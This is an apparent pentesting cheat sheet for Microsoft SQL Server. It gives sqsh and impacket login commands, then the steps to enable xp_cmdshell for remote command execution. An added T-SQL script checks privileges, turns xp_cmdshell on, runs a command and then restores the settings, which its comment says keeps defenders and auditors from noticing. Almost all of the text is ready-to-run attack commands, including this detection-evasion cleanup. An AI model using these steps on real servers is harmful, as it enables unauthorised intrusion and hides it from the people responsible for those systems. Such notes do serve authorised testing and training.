1433 - MSSQL
Useful logins (sqsh and impacket):
Login (SQL auth):
sqsh -S <IP> -U <username> -P "<pass>"
Login (Windows auth with a local account, pick the database):
sqsh -S <IP> -U .\\<Username> -P <pass> -D <database>
Login (Windows auth, domain or local account):
impacket-mssqlclient <domain>/<username>:<pass>@<IP> -windows-auth
Login (SQL auth, e.g. sa; this is the default when -windows-auth is omitted):
impacket-mssqlclient <username>:<pass>@<IP>
xp_cmdshell -> RCE
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
In sqsh nothing is sent until you type GO on its own line after the query.
Run the following commands one at a time:
# Which principals have been granted EXECUTE on xp_cmdshell
# (sysadmins can run it without a grant, so an empty result is not a dead end)
USE master
GO
EXEC sp_helprotect 'xp_cmdshell'
GO
# Check whether xp_cmdshell is enabled (value_in_use = 1 means on)
SELECT name, value, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';
GO
# Show advanced options; xp_cmdshell cannot be configured until this is on.
# sp_configure and RECONFIGURE need ALTER SETTINGS (sysadmin or serveradmin).
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
GO
# Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
GO
# Commands run as the SQL Server service account for sysadmins, or under the
# xp_cmdshell proxy account for other logins (fails if no proxy is set)
EXEC master..xp_cmdshell 'whoami'
GO
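The same procedure as one self-contained sqsh session, added here as an example and not part of the original notes: it checks your rights first, enables xp_cmdshell only if it is currently off, captures the command output in a temp table so multi-line results stay readable, and puts the configuration back the way it was. The temp table name #out and the choice of whoami as the test command are my own.

```sql
-- Added example (not from the original notes). Paste into sqsh; each GO sends
-- the batch above it. Assumes the login has ALTER SETTINGS (sysadmin/serveradmin).
USE master
GO

-- 1. Who am I, and am I allowed to change server settings?
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin')    AS is_sysadmin,
       IS_SRVROLEMEMBER('serveradmin') AS is_serveradmin;
GO

-- 2. Everything below runs in a single batch so @was_enabled stays in scope.
DECLARE @was_enabled INT;
SELECT @was_enabled = CAST(value_in_use AS INT)
FROM sys.configurations
WHERE name = 'xp_cmdshell';

IF @was_enabled = 0
BEGIN
    -- xp_cmdshell is an advanced option; it cannot be set until those are shown.
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
END;

-- 3. Run the command. Sysadmins execute as the SQL Server service account;
--    other logins execute under ##xp_cmdshell_proxy_account## if one exists.
--    INSERT ... EXEC keeps every output line (the hypothetical #out table).
CREATE TABLE #out (line NVARCHAR(4000));
INSERT INTO #out EXEC master..xp_cmdshell 'whoami';
SELECT line FROM #out WHERE line IS NOT NULL;
DROP TABLE #out;

-- 4. Leave the instance as you found it: an xp_cmdshell left enabled is a loud,
--    persistent change that defenders and later auditors will notice.
IF @was_enabled = 0
BEGIN
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
    EXEC sp_configure 'show advanced options', 0;
    RECONFIGURE;
END;
GO
```

If the first SELECT shows neither sysadmin nor serveradmin, the sp_configure calls will fail and only the sp_helprotect result tells you whether you can call xp_cmdshell anyway (it must already be enabled and you must have been granted EXECUTE on it).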